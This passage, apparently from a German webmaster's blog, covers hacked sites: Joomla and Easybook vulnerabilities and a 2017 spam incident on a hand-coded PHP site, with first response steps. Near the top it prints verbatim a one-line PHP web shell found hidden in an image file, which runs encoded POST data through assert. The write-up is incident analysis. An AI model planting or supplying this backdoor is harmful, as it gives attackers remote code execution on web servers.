Server gehackt?
thumb_j2.php.jpg
<?php @assert(@base64_decode(@str_rot13($_POST["data"])));?>Unabhängig davon ist die Datei ein Bild und wird als solches angezeigt.
Wie ist die Datei auf den Server gekommmen?
Im konkreten Fall wurde die befallene Homepage in Joomla 2.5.14 erstellt und seit der Erstellung nicht upgedatet.
Sicherheitslücke im Joomla-Core
"Hilfe mein Server wurde gehackt!"
Durch eine Sicherheitslücke im Joomla-Core konnte fremder Code eingeschleust werden.
Kurz vor Weihnachten 2015 wurden viele Joomla-Installationen angegriffen. Es gab auch sehr schnell ein Sicherheitsupdate, aber das musste erstmal installiert werden.
Wer zulange gewartet hat, hat dann auch prompt fremden Code auf seinem Server entdeckt. Meist aber erst, als der Server bereits als SPAM-Schleuder eifrig Mails versendet hat!
Sicherheitslücke in Easybook
2010 wurde in Sicherheitslücke in der Erweiterung Easybook entdeckt und von Hackern konsequent ausgenutzt.
Damals hatte ich Glück, in meinen Webseiten wurden Gästebucheinträge nicht automatisch freigegeben und waren zusätzlich über Captcha geschützt. Außerdem hatte ich den BBCode deaktiviert. Nach Bekanntwerden des Problems habe ich alle betroffenen Seiten sofort kontrolliert und das Gästebuch vorübegehend deaktiviert.
Details dazu sind im Archiv: Sicherheitslücke in Easybook nachzulesen
Unterkategorien
2017-03 - freie Programmierung in PHP
Die betroffene Seite wurde vor über 10 Jahren frei programmiert in PHP. Dabei wurde kein PHP-Framework verwendet. Für clientseitige Funktionen, z.B. für die Validierung von Kontaktanfragen, wurde JQuery verwendet.
Dennoch hat die Postausgangskontrolle im Plesk ein Überschreiten der Grenzwerte gemeldet.
Über 50 Emails pro Stunde sind nicht normal! Die zugelassenen max. 10 pro Stunde für ein Postfach wurden hier ausgehebelt, weil nicht über smtp versendet wurden, sondern mit dem PHP-Mailer. Somit wurde erst bei erreichen des Grenzwertes für die gesamte Domain Alarm geschlagen.
Bei der Untersuchung der Webseite sind sofort mehrere Indizien dafür aufgefallen, dass die Seite gehackt wurde.
Wichtig!
Als Sofortmaßnahme wurde die Seite vom Netz genommen und der FTP-Zugang geändert.
Fehleranalyse und Maßnahmen zur Absicherung der Webseite
Wenn die akute Gefahr erst einmal behoben ist, indem der Server vom Netz genommen wurde bzw. die entsprechende Webseite gesperrt wurde, kann mit der Fehleranalyse begonnen werden.
Was ist passiert und was ist zu tun, damit es nicht wieder passiert?
Bei der lokalen Sicherung der Seite für eine Fehleraufklärung hat Micosoft Security Essentials mehrere Male wegen BackDoor:PHP/Small.M Alarm geschlagen und diesen unverzüglich bereinigt.
Lokal können diese Dateien nun keinen Schaden mehr anrichten, aber im Web waren sie bereits aktiv! Eine Software, die ...